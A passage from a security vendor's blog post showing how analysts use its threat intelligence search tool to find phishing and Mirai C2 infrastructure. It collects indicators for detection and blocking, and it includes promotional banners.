<li><strong>Build stronger hunting hypotheses: </strong>Use behavioral, network, and infrastructure intelligence to validate assumptions and identify additional leads. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Collect actionable observables: </strong>Identify relevant IOCs for retrospective hunting, blocking, enrichment, and further investigation in SIEM, NDR, and other security systems. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Improve detection coverage: </strong>Turn investigation findings into inputs that Detection &amp; Security Engineering teams can use to develop or expand detections. </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/cybersecurity-blog/threat-hunting-practical-usecases/" target="_blank" rel="noreferrer noopener"><strong>Streamline threat hunting</strong></a><strong> workflows: </strong>Reduce reliance on individual analysts manually piecing together threat context, helping SOC teams make investigations and <a href="https://any.run/cybersecurity-blog/soc-ready-reporting/" target="_blank" rel="noreferrer noopener">handoffs</a> more consistent. </li>
</ul>



<p class="wp-block-paragraph">For threat hunters, that means less time assembling context and more time testing hypotheses and uncovering malicious activity. For CISOs and SOC leaders, it means a more repeatable process for <a href="https://any.run/cybersecurity-blog/streamline-your-soc/" target="_blank" rel="noreferrer noopener">turning threat intelligence into security outcomes</a>, from investigation and escalation to detection and response. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Bring average MTTD down to <span class="highlight">14 seconds</span> with ANY.RUN<br>
Proactive security with intelligence from <span class="highlight">16K+ SOCs </span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=proactive-threat-hunting&#038;utm_term=190826&#038;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noopener">
Explore in your SOC
</a>
<!-- CTA Link -->
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
.regular-banner__link:hover {
background-color: #FFFFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">The value of threat intelligence is in how quickly your team can turn indicators into evidence, decisions, and better protection. </p>



<p class="wp-block-paragraph">What does that look like in an actual investigation? </p>



<h2 class="wp-block-heading">Use Case #1. Finding Infrastructure Shared by Threats </h2>



<p class="wp-block-paragraph">You’ve identified a threat relevant to <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">your organization</a> and are approaching the final stage of the investigation: turning the findings into a set of actionable indicators that can be handed off to the detection &amp; security engineering team. </p>



<p class="wp-block-paragraph">For that, you need to identify IP addresses and domains associated with VPS or hosting providers that also have a negative reputation. These observables can reveal infrastructure used to support malicious activity and provide additional coverage beyond the indicators that initially led to the threat. </p>



<h3 class="wp-block-heading">Start with a known threat </h3>



<p class="wp-block-paragraph">Build a query in <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> using a <a href="https://any.run/cybersecurity-blog/search-operators-and-wildcards-in-ti-lookup/" target="_blank" rel="noreferrer noopener">wildcard</a> (*) to capture variations in Suricata messages and find URL activity related to <a href="https://any.run/cybersecurity-blog/salty2fa-tycoon2fa-hybrid-phishing-2025/" target="_blank" rel="noreferrer noopener">Tycoon2FA</a> without relying on an exact message string: </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktoservice#{%22query%22:%22suricataMessage:%5C%22tycoon*url%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">suricataMessage:&#8221;tycoon*url&#8221;</a> </p>



<p class="wp-block-paragraph">View <strong>Connections </strong>tab listing all related domains, IPs, and URLs. It helps you realize which indicators are connected to each other: </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1530" height="864" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/connections3-1.gif" alt="" class="wp-image-22720"/></figure>



<p class="wp-block-paragraph"><em>Connections show observable relationships in ANY.RUN data to help you build and validate a hypothesis. Threat Intelligence Lookup</em> </p>



<h3 class="wp-block-heading">Narrow down the relevant observables </h3>



<p class="wp-block-paragraph">Whitelisted indicators are hidden by default, so the data you see is already pre-filtered to help you maintain focus on more relevant connections. Additionally, you can apply the Malicious filter and export the results as JSON. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="251" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.34.15-1024x251.png" alt="" class="wp-image-22700" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.34.15-1024x251.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.34.15-300x74.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.34.15-768x189.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.34.15-1536x377.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.34.15-2048x503.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.34.15-370x91.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.34.15-270x66.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.34.15-740x182.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Filters allow you to sort the observables by verdict to narrow down your search. Threat Intelligence Lookup</em> </figcaption></figure>



<h3 class="wp-block-heading">Check the underlying infrastructure </h3>



<p class="wp-block-paragraph">If a URL is malicious, but its IP appears benign, this probably means that a shared infrastructure is being used, such as a CDN or reverse proxy. For example: </p>



<p class="wp-block-paragraph"><strong>Cloudflare AS13335 — Captcha Reverse Proxy / Gateway </strong> </p>



<p class="wp-block-paragraph">https://ipinfo[.]io/188[.]114[.]97[.]3</p>



<p class="wp-block-paragraph">If both the URL and IP are marked malicious, this most likely points to VPS or hosting infrastructure used by threat actors, for example: </p>



<p class="wp-block-paragraph"><strong>HostPapa AS36352 — VPS Service </strong> </p>



<p class="wp-block-paragraph">https://ipinfo[.]io/23[.]94[.]153[.]149</p>



<h3 class="wp-block-heading">Put the findings to work </h3>



<p class="wp-block-paragraph">The resulting IOC set can be now used for retrospective hunting in SIEM/NDR to identify previous activity involving the same infrastructure, as well as for blocking on perimeter firewalls to reduce the risk of further communication with known suspicious infrastructure. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Shorten the path to investigation with TI Lookup<br>Hunt with threat intelligence from <span class="highlight">16K+ security teams
</span> 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://login.any.run/register?redirect=https://intelligence.any.run/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=proactive-threat-hunting&#038;utm_term=190826&#038;utm_content=linktoservice  " target="_blank" rel="noopener">
Try TI Lookup
</a>
<!-- CTA Link -->
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
.regular-banner__link:hover {
background-color: #FFFFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Use Case #2. Validating Threat Hunting Hypotheses </h2>



<p class="wp-block-paragraph">While working with a <a href="https://any.run/cybersecurity-blog/threat-intelligence-reports/" target="_blank" rel="noreferrer noopener">TI Report</a> or an <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> analysis session, you notice that after downloading the payload, the malware established a C2 connection over the non-standard port 1337. Based on that, you come up with a hypothesis: all samples with similar behavior may be tied to common infrastructure. </p>



<p class="wp-block-paragraph">To confirm or disprove this hypothesis, you need to start with a Threat Intelligence Lookup query for the observed behavior, in this case, MITRE T1105 and destination port 1337. </p>



<p class="wp-block-paragraph">You can use <a href="https://any.run/cybersecurity-blog/expanded-free-ti-plan/" target="_blank" rel="noreferrer noopener">AI-powered search</a> and just list the desired TTP and port number without using proper syntax: </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="112" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.41.40-1024x112.png" alt="" class="wp-image-22703" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.41.40-1024x112.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.41.40-300x33.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.41.40-768x84.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.41.40-1536x168.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.41.40-370x40.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.41.40-270x30.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.41.40-740x81.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.41.40.png 1902w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup is powered by AI search to help you with query building</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktoservice#{%22query%22:%22MITRE:%5C%22T1105%5C%22%20and%20destinationPort:%5C%221337%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">MITRE:&#8221;T1105&#8243; AND destinationPort:&#8221;1337&#8243;</a> </p>



<h3 class="wp-block-heading">Explore the related infrastructure </h3>



<p class="wp-block-paragraph">In Connections, you can see the number of unique addresses, their reputation, geographic context (in CN tab marking the country of submission), and potential C2 infrastructure: </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="396" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.43.07-1024x396.png" alt="" class="wp-image-22702" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.43.07-1024x396.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.43.07-300x116.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.43.07-768x297.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.43.07-1536x594.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.43.07-2048x791.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.43.07-370x143.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.43.07-270x104.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-18-at-11.43.07-740x286.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Analyze connections between URLs, domains, IPs, ports, and countries related to your request. Threat Intelligence Lookup</em> </figcaption></figure>



<p class="wp-block-paragraph">To confirm or disprove the hypothesis, all you need to do is collect network IOCs and check them in your corporate SIEM. From the results, you can make an evidence-based conclusion. </p>



<h3 class="wp-block-heading">Pivot to Interactive Sandboxing </h3>



<p class="wp-block-paragraph">To further validate your hypothesis, open the <strong>Analyses </strong>tab and review related sandbox sessions. Select a sample to see how the attack unfolds and compare its behavior with the activity you initially observed. </p>



<p class="wp-block-paragraph">One of the samples in our TI Lookup results leads to a Sandbox analysis of a malicious script delivered via a user-opened ZIP file. Here, we can see the attack unfold — from scheduled-task persistence to system enumeration and potential data exfiltration. </p>



<p class="wp-block-paragraph"><a href="https://app.any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktoservice/tasks/38cb400c-5301-410b-9687-1153201f0f53" target="_blank" rel="noreferrer noopener">View analysis</a> </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="569" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/example_sb-1024x569.png" alt="" class="wp-image-22724" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/example_sb-1024x569.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/example_sb-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/example_sb-768x427.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/example_sb-1536x854.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/example_sb-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/example_sb-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/example_sb-740x411.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/example_sb.png 1823w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">A malicious sample analyzed in ANY.RUN’s Interactive Sandbox </figcaption></figure>



<h3 class="wp-block-heading">Submitting your findings </h3>



<p class="wp-block-paragraph">If your hypothesis was confirmed, pass the findings and context to the detection &amp; security engineering team to create new detection rules. They will contribute to your organization’s proactive security posture. </p>



<h2 class="wp-block-heading">Use Case #3. Reverse URL Search Across Domain Patterns </h2>



<p class="wp-block-paragraph">We investigate phishing campaigns. We’re particularly interested in domains related to brands, CTAs, and social engineering elements. </p>



<p class="wp-block-paragraph">When investigating phishing campaigns, you may need to find domains related to brands, CTAs, and <a href="https://any.run/cybersecurity-blog/social-engineering-attacks-2026/" target="_blank" rel="noreferrer noopener">social engineering</a> elements. </p>



<p class="wp-block-paragraph">You also need to enrich them with context to understand which URLs were observed, which IPs they resolved to, their reputation, and finally, which IOCs can be used to expand detection coverage.  </p>



<p class="wp-block-paragraph">This may sound like a lot, but with TI Lookup, this can be done fast. </p>



<p class="wp-block-paragraph">Build a query for the required threat, for example, DocuSign-related activity: </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktoservice#{%22query%22:%22domainName:%5C%22docusign*share%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">domainName:&#8221;docusign*share&#8221;</a> </p>



<p class="wp-block-paragraph">And you can check the dedicated Domains, URLs, and IPs tabs to explore related observables. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="337" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-ti-lookup-1024x337.png" alt="" class="wp-image-22706" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-ti-lookup-1024x337.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-ti-lookup-300x99.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-ti-lookup-768x253.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-ti-lookup-1536x505.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-ti-lookup-2048x674.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-ti-lookup-370x122.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-ti-lookup-270x89.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-ti-lookup-740x243.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Tab listing domains related to the DocuSign request in TI Lookup</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">To see connections between them, click <strong>Show relations </strong>for a full breakdown: </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="526" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-1024x526.png" alt="" class="wp-image-22708" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-1024x526.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-300x154.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-768x394.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-1536x788.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-2048x1051.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-370x190.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-270x139.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-585x300.png 585w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/docusign-relation-ti-lookup-1-740x380.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Relations between domains, URLs, and IPs for the same query. TI Lookup</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">This significantly accelerates the search and analysis of related IOCs by bringing the relevant network context into a single workflow. <br>Use the relevant IOCs to expand detection coverage and support further investigation of the phishing campaign. </p>



<h2 class="wp-block-heading">Use Case #4. For DFIR Analysts: Gathering C2 Infrastructure of Mirai </h2>



<p class="wp-block-paragraph">The <a href="https://any.run/cybersecurity-blog/triage-analyst-guide/" target="_blank" rel="noreferrer noopener">alert triage</a> team has passed you a confirmed incident related to Mirai. Your goal is to collect additional IOCs, find related URLs and IPs, and determine the scale of the threat. </p>



<p class="wp-block-paragraph">Once again, you start the investigation with what’s known. Browse the confirmed threat in TI Lookup to find relevant threat intelligence and associated infrastructure: </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktoservice#{%22query%22:%22threatName:%5C%22^mirai$%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">threatName:&#8221;^mirai$&#8221;</a> </p>



<p class="wp-block-paragraph">Narrow down the result by applying the Malicious filter: </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="535" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/threatname-mirai-lookup-1-1024x535.png" alt="" class="wp-image-22710" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/threatname-mirai-lookup-1-1024x535.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/threatname-mirai-lookup-1-300x157.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/threatname-mirai-lookup-1-768x401.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/threatname-mirai-lookup-1-1536x802.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/threatname-mirai-lookup-1-2048x1069.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/threatname-mirai-lookup-1-370x193.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/threatname-mirai-lookup-1-270x141.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/threatname-mirai-lookup-1-740x386.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Filtering results by verdict in Threat Intelligence Lookup</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">Collect the clean list of observables, including related URLs and IP addresses, and export the results:</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="288" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/searchresults-ti-lookup-anyrun-json-1-1024x288.png" alt="" class="wp-image-22712" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/searchresults-ti-lookup-anyrun-json-1-1024x288.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/searchresults-ti-lookup-anyrun-json-1-300x84.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/searchresults-ti-lookup-anyrun-json-1-768x216.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/searchresults-ti-lookup-anyrun-json-1-1536x432.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/searchresults-ti-lookup-anyrun-json-1-2048x576.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/searchresults-ti-lookup-anyrun-json-1-370x104.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/searchresults-ti-lookup-anyrun-json-1-270x76.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/searchresults-ti-lookup-anyrun-json-1-740x208.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Download search results in JSON format for easy handoff. TI Lookup</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">Pass the resulting IOC set to the detection &amp; security engineering team for retrospective hunting and to expand threat detection coverage. </p>



<p class="wp-block-paragraph">The team now has all data needed to update playbooks and detection rules based on collective threat intelligence from <a href="https://any.run/cybersecurity-blog/soc-business-success-cases-anyrun/" target="_blank" rel="noreferrer noopener">16K+ SOC teams</a>. </p>



<h2 class="wp-block-heading">Operational Impact for Security Teams </h2>



<ul class="wp-block-list">
<li><strong>Reduce manual investigation effort </strong>by spending less time switching between sources and correlating network infrastructure data. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Move faster from intelligence to action </strong>by turning TI findings into observables ready for retrospective hunting, blocking, or handoff to detection &amp; security engineering. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Make investigations more consistent and repeatable </strong>by bringing relationships, reputation data, and filtering into a unified workflow with exportable results. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Streamline cross-team handoffs</strong> by reducing the need to recollect and repackage data between threat hunting, DFIR, and detection engineering teams. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Increase team throughput </strong>by enabling analysts to handle more investigations without a proportional increase in manual effort. </li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut MTTR</span>  by 21 minutes per case <br>
<span class="highlight">Actionable</span>  threat intelligence for faster response in SOCs
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=proactive-threat-hunting&#038;utm_term=190826&#038;utm_content=linktotilookuplanding#contact-sales" target="_blank" rel="noopener">
Integrate TI Lookup
</a>
<!-- CTA Link -->
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
.regular-banner__link:hover {
background-color: #FFFFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">Effective threat intelligence and proactive threat hunting are about turning threat data into action. With ANY.RUN Threat Intelligence, security teams can investigate malware and phishing activity, validatehunting hypotheses, uncover related infrastructure, collect actionable IOCs, and use those findings to strengthen detection and response. </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> fits into modern SOC workflows, integrating with existing security processes and supporting operations across teams. This includes <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">safely detonating files and URLs to expose malicious behavior</a>, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">enriching investigations with broader threat intelligence</a>, and applying <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">continuously updated intelligence</a> to support faster, more informed decisions. </p>



<p class="wp-block-paragraph">Today, more than 700,000 security professionals and 16,000 organizations use ANY.RUN to accelerate investigations, reduce unnecessary escalations, and strengthen their defenses against evolving malware and phishing threats. </p>



<p class="wp-block-paragraph">For the latest threat research, real-world attack analysis, and investigation insights, follow ANY.RUN on <a href="https://www.linkedin.com/company/any-run/" target="_blank" rel="noreferrer noopener">LinkedIn</a> and <a href="https://x.com/anyrun_app/" target="_blank" rel="noreferrer noopener">X</a>. </p>



<h2 class="wp-block-heading">FAQ </h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1787134332541"><strong class="schema-faq-question">What is proactive threat hunting? </strong> <p class="schema-faq-answer">Proactive threat hunting is the process of searching for threats before they trigger traditional security alerts. It uses threat intelligence, behavioral data, and IOCs to identify potentially malicious activity. </p> </div> <div class="schema-faq-section" id="faq-question-1787134338945"><strong class="schema-faq-question">How does ANY.RUN support threat hunting? </strong> <p class="schema-faq-answer">ANY.RUN Threat Intelligence helps analysts investigate malware and phishing threats, explore related infrastructure, validate hypotheses, and collect actionable IOCs. </p> </div> <div class="schema-faq-section" id="faq-question-1787134343695"><strong class="schema-faq-question">What is ANY.RUN Threat Intelligence Lookup? </strong> <p class="schema-faq-answer">Threat Intelligence Lookup is a search solution for investigating threats using indicators, behaviors, network data, and other threat intelligence collected through ANY.RUN. </p> </div> <div class="schema-faq-section" id="faq-question-1787134354584"><strong class="schema-faq-question">How can threat intelligence improve malware detection? </strong> <p class="schema-faq-answer">Threat intelligence provides additional context around malware behavior, infrastructure, and related observables. Security teams can use these findings to improve detection rules and expand coverage. </p> </div> <div class="schema-faq-section" id="faq-question-1787134362994"><strong class="schema-faq-question">Can ANY.RUN help investigate phishing attacks? </strong> <p class="schema-faq-answer">Yes. Analysts can use ANY.RUN to investigate phishing URLs, domains, IP addresses, infrastructure, and related indicators to better understand phishing campaigns. </p> </div> <div class="schema-faq-section" id="faq-question-1787134367980"><strong class="schema-faq-question">How can IOCs be used in SIEM and NDR? </strong> <p class="schema-faq-answer">Relevant IOCs can be checked against SIEM and NDR data for retrospective threat hunting and signs of previous malicious activity. Validated findings can also support new detections and response actions. </p> </div> <div class="schema-faq-section" id="faq-question-1787134375777"><strong class="schema-faq-question">How does threat intelligence help SOC teams? </strong> 